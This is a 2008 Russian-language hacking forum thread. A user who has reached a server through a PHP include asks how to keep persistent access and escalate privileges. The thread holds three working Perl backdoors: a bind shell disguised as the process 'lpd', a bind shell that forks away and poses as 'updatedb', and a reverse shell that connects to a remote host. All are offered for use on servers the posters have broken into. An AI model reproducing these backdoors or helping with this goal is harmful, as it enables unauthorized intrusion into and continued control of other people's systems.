помогите разобратся с серваками

Discussion in 'Безопасность и Анонимность' started by ya_mag, 2 Jan 2008.

  1. ya_mag

    ya_mag Elder - Старейшина

    Joined:
    18 Jan 2007
    Messages:
    52
    Likes Received:
    8
    Reputations:
    10
    Вобщем ситуация такая есть на одном серваке php инклуд т.е. доступ к консоле есть но вот сталкнулся с такой проблемой заливаю бакконект компилирую и нифига не работает... он ко мне не конектится пробовал несколько перловых скриптов бак конект и бакдор тоже не работает посоветуйте как можно закрепится на этом серваке и как поднять прова?
    и 2-ое есть ещё один сервак там без проблем работает бакконект но этот скрипт:
    Code:
    #!/usr/bin/perl
# * Usage:
# remote.com$ ./nohup bindshell.pl &
# remote.com$ exit
# Connection closed by foreign host
# localhost$ telnet remote.com 60000
# Trying 192.168.1.1...
# Connected to remote.com.
# Escape character is '^]'.
# (user@remote.com:/home/user/)
# cat /etc/passwd; etc

use Socket;
$port = 60000;
$proto = getprotobyname('tcp');
$cmd = "lpd";
$system	= 'echo "(`whoami`@`uname -n`:`pwd`)"; /bin/sh';
$0 = $cmd;
socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!";
bind(SERVER, sockaddr_in($port, INADDR_ANY))	or die "bind: $!";
listen(SERVER, SOMAXCONN) or die "listen: $!";
for(; $paddr = accept(CLIENT, SERVER); close CLIENT)
{open(STDIN, ">&CLIENT");
open(STDOUT, ">&CLIENT");
open(STDERR, ">&CLIENT");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
}
    не правильно как то работает т.е. я подключаюсь к нему через телнет и он мне все время выдает курсор не в начале строки а с отступом и при попытках запустить хоть одну команду постаянно пишет ошибку :( что в нем не так... или подскажите какие нибудь другие бакдоры.
    ЗЫ: пожалуйсто отвечайте по подробней!

    зараннее спасибо!
     
    #1 ya_mag, 2 Jan 2008
  2. Ky3bMu4

    Ky3bMu4 Elder - Старейшина

    Joined:
    3 Feb 2007
    Messages:
    487
    Likes Received:
    284
    Reputations:
    42
    Вот те раз.
    Вот те два(поищи, там много интересного).
     
    #2 Ky3bMu4, 2 Jan 2008
  3. MicRO

    MicRO Member

    Joined:
    28 Oct 2004
    Messages:
    274
    Likes Received:
    75
    Reputations:
    49
    Я пользуюсь классикой :)
    bind.pl
    Code:
    #!/usr/bin/perl

$port = 32666; 
$port = $ARGV[0] if $ARGV[0];
exit if fork;
$0 = "updatedb" . " " x100;
$SIG{CHLD} = 'IGNORE';
use Socket;
socket(S, PF_INET, SOCK_STREAM, 0);
setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
bind(S, sockaddr_in($port, INADDR_ANY));
listen(S, 50);
while(1)
{
	accept(X, S);
	unless(fork)
	{
		open STDIN, "<&X";
		open STDOUT, ">&X";
		open STDERR, ">&X";
		close X;
		exec("/bin/sh");
	}
	close X;
}
    back.pl
    Code:
    use Socket;
$ip=$ARGV[0];
$port=$ARGV[1];
$shell=$ARGV[2];
$system= "$shell";
$0=$cmd;
$shell=$ARGV[2];
$iaddr=inet_aton($ip) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCK, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCK");
open(STDOUT, ">&SOCK");
open(STDERR, ">&SOCK");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
     
    #3 MicRO, 3 Jan 2008
    1 person likes this.
(You must log in or sign up to post here.)